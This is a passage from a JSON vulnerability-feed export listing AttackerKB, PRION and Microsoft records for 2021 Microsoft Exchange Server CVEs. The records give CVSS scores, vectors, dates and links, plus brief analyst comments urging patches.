"CVE-2021-33766 ProxyToken", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-31T00:00:00", "id": "AKB:B86FF102-0FBC-45A5-8D59-B98CA36BFCF9", "href": "https://attackerkb.com/topics/EYDEd51S7V/cve-2021-33766-proxytoken", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-11T20:27:56", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33768, CVE-2021-34470.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-34523", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34523"], "modified": "2021-07-23T00:00:00", "id": "AKB:6F1D646E-2CDB-4382-A212-30728A7DB899", "href": "https://attackerkb.com/topics/RY7LpTmyCj/cve-2021-34523", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T23:18:13", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at July 14, 2021 7:15pm UTC reported:\n\nThis remote code execution (RCE) vulnerability affects Microsoft Exchange Server 2013/ CU23/2016 CU20/2016 CU21/2019 CU10. \nAnd according to FireEye exploit code is available. \nI will share more information once MSFT releases more details\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-31206", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-09-21T00:00:00", "id": "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "href": "https://attackerkb.com/topics/oAhIZujU2O/cve-2021-31206", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T17:21:09", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at July 14, 2021 5:15pm UTC reported:\n\nFrom <https://blog.talosintelligence.com/2021/07/microsoft-patch-tuesday-for-july-2021.html> there was a note that this vulnerability seems to have been used in some Exchange Server APT attacks detailed at <https://blog.talosintelligence.com/2021/03/hafnium-update.html> however it wasn\u2019t disclosed that this vulnerability was patched despite being patched back in April 2021. Since this was under active exploitation it is recommended to patch this vulnerability if you haven\u2019t applied April 2021\u2019s patch updates already.\n\nSuccessful exploitation will result in RCE on affected Exchange Servers, and requires no prior user privileges, so patch this soon!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-34473", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-20T00:00:00", "id": "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "href": "https://attackerkb.com/topics/pUK1MXLZkW/cve-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-08-16T02:56:24", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28481, CVE-2021-28482.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-13T20:15:00", "type": "prion", "title": "CVE-2021-28483", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-14T13:01:00", "id": "PRION:CVE-2021-28483", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-28483", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T02:56:22", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28481, CVE-2021-28482, CVE-2021-28483.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T20:15:00", "type": "prion", "title": "CVE-2021-28480", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-14T13:00:00", "id": "PRION:CVE-2021-28480", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-28480", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T02:56:23", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28482, CVE-2021-28483.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T20:15:00", "type": "prion", "title": "CVE-2021-28481", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-14T12:58:00", "id": "PRION:CVE-2021-28481", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-28481", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T02:56:23", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28481, CVE-2021-28483.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T20:15:00", "type": "prion", "title": "CVE-2021-28482", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-14T12:58:00", "id": "PRION:CVE-2021-28482", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-28482", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T05:48:10", "description": "Microsoft Exchange Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-14T18:15:00", "type": "prion", "title": "CVE-2021-33766", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-07-16T14:41:00", "id": "PRION:CVE-2021-33766", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-33766", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-16T05:58:37", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33768, CVE-2021-34470.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "prion", "title": "CVE-2021-34523", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34523"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-34523", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-34523", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T05:48:10", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-34470, CVE-2021-34523.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "prion", "title": "CVE-2021-33768", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.2, "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34523"], "modified": "2022-05-03T16:04:00", "id": "PRION:CVE-2021-33768", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-33768", "cvss": {"score": 5.2, "vector": "AV:A/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T05:58:09", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33768, CVE-2021-34523.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "prion", "title": "CVE-2021-34470", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.2, "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34523"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-34470", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-34470", "cvss": {"score": 5.2, "vector": "AV:A/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T04:51:57", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31206, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "prion", "title": "CVE-2021-31196", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-17T03:31:00", "id": "PRION:CVE-2021-31196", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-31196", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T04:52:14", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "prion", "title": "CVE-2021-31206", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.9, "vectorString": "AV:A/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-09-20T12:20:00", "id": "PRION:CVE-2021-31206", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-31206", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T05:58:10", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "prion", "title": "CVE-2021-34473", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-34473", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-06-14T15:25:56", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28481, CVE-2021-28483.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-13T07:00:00", "id": "MS:CVE-2021-28482", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28482", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:56", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28481, CVE-2021-28482.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-13T07:00:00", "id": "MS:CVE-2021-28483", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28483", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:56", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28482, CVE-2021-28483.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-13T07:00:00", "id": "MS:CVE-2021-28481", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28481", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:56", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28481, CVE-2021-28482, CVE-2021-28483.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 